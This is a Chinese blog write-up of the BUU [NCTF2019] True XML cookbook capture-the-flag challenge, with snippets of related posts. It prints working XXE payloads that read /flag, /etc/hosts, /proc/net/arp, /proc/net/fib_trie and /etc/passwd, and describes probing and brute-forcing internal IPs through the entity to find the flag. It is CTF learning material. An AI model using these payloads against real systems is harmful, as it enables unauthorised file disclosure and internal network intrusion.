BUU [NCTF2019]True XML cookbook

已于 2022-04-19 16:08:01 修改
阅读量1.8k 收藏 6
点赞数 4
分类专栏: ctf刷题记录 文章标签: web安全 学习 安全 xml
于 2022-04-19 16:07:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/124275773
版权

打开连接

 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml

payload:<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 测试直接读取flag失败,试试内网探测看是否有结果

内网探测命令

/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/hosts">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 

 并未发现任何主机,尝试其他命令

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///proc/net/arp">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 这里扫出了两个主机,尝试访问

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "http://10.128.253.12 ">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 失败

用BP的intruder模块来爆破ip1-100

 add这里

 设置数字字典从1到100

 线程可以调高点

这里我把两个ip都爆破了一次,都没发现flag

尝试其他命令进行探测最后用此命令扫出了正确的ip

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///proc/net/fib_trie">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 爆破得到flag

芜湖

H3018-R
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
【xxe漏洞】buu_[NCTF2019]True XML cookbook
serendipity1130的博客
10-09 254
1.打开网页,一个熟悉的界面,抓包发现Content-Type:为application/xml,存在xxe漏洞: 2.读取相关敏感文件proc/net/arp,发现存在一个ip地址: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY exp SYSTEM "file:///proc/net/arp"> ]> <user><username>&exp;&
[NCTF2019]Fake XML cookbook(特详解)
最新发布
qq_74806534的博客
01-30 2万+
攻击者可以通过构造恶意的 XML 文档将其发送到应用程序中,在解析该文档时,XML 解析器会加载外部实体(如文件、URL等),以便在文档中引用它们。PHP 默认使用 libxml 来解析 XML,但是从 libxml 2.9.0 开始,它默认不再解析外部实体,导致 PHP 下的 XXE 漏洞已经逐渐消失,除非你指定 LIBLXML_NOENT 去开启外部实体解析,才会存在 XXE 漏洞。4.在成功回调函数中,根据返回的 XML 数据解析出登录结果的代码和消息,然后根据不同的结果更新页面上的提示信息。
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为三个,Bibi是制片人,Babidi是去除魔鬼印记的人,Buu成了魔鬼的名字。 以下是您将获得的其他功能的列表:-待办事项列表-设置您喜欢的壁纸-发现新的热点-书签-社交网络通知-每个新标签的高品质壁纸-时钟显示日期和时间-天气小部件-打开搜索 支持语言:English,中文 (简体),中文 (繁體)
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
[NCTF2019]True XML cookbook 1
snowlyzz的博客
05-05 476
又是一道关于XML注入的题 xml语法: <?xml version="1.0" encoding="UTF-8"?> //xml声明 ​ <!DOCTYPE copyright [ //DTD(文档类型定义) ​ <!ELEMENT note (to,reset,login)> //定义元素 ​ <!ENTITY test SYSTEM "url"> //定义外部实体test ​ ]> 直接抓包! <...
[NCTF2019]True XML cookbook
qq_52907838的博客
08-04 2356
打开环境,看到熟悉的页面,和前面的[NCTF2019]Fake XML cookbook页面一样,应该也是XXE漏洞,这里再介绍一下XXE漏洞: XXE(XML External Entity Injection)全称为XML外部实体注入。 XML是什么? XML指可扩展标记语言(EXtensible Markup Language),其设计宗旨是传输数据,而不是显示数据,用来结构化、存储以及传输信息,它没有预定义的标签。XML 和 HTML 之间的差异是什么? 设计目的不同:XML 被设计用来传输
[NCTF 2019]True XML cookbook
m0_70819573的博客
04-21 332
不能直接在根目录读取flag,但可以通过/etc/hosts获取内网。再通过扫描c段获得flag。
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
[NCTF2019]True XML cookbook Writeup
StevenOnesir的博客
12-29 457
结合本题简要讲解一下xxe攻击 本篇文章默认读者了解Xml基本格式 首先我们看到一个登录界面,使用burp抓包看一下: 这里暴露出来很明显的xxe注入点。 我们开始构造payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE hacker[ <!ENTITY a SYSTEM "file:///etc/passwd"> ]> <user><username>&a;</us
BUU系列
qq_49422880的博客
07-20 321
[NCTF2019]True XML cookbook   打开页面是一个登录页面,那攻击的方式就很多了,但是根据题目所给的提示,与XML相关,所以估计不是注入或者弱口令之类的,发现源代码的下面有一些代码,进行一下代码审计。 function doLogin(){ //登录函数 var username = $("#username").val(); //获取变量的值 var password = $("#password").val(); if(username == "" || passwo
[NCTF2019]True XML cookbook 记录
SopRomeo的博客
07-21 1839
提交抓包发现是xxe 先拿XXE漏洞poc读/flag <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file:///flag"> ]> <user> <username>&file;</username> <password>hack</password> </user&g.
buu cipher
10-23
Buu Cipher 是一种对称加密算法,也被称为布式密码。它是一种较为简单的加密算法,基于置换和替代的原理进行加密和解密。Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中的不同位置,增加了密文的复杂性。 其次,扩散步骤通过将每个字符替换为另一个字符来进一步混淆数据。此替换过程可以由算法中的扩散函数完成,该函数使用密钥和置换表来生成相应的替代字符。这样,明文中的每个字符都将被替换为不同的字符。 解密过程与加密过程相反。先使用相同的密钥和置换表进行扩散的逆向操作,将密文中的每个字符恢复为替代字符。然后使用相同的密钥和置换表进行混淆的逆向操作,恢复密文中字符的顺序,即可得到原始的明文。 尽管 Buu Cipher 是一种较为简单的加密算法,但它仍可以提供基本的保密性,以防止未授权者对加密数据的解读。然而,它的加密强度相对较低,可能容易受到密码分析方法的攻击。因此,在实际应用中,我们可能需要结合其他更为复杂和安全的加密算法来提高数据的保密性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值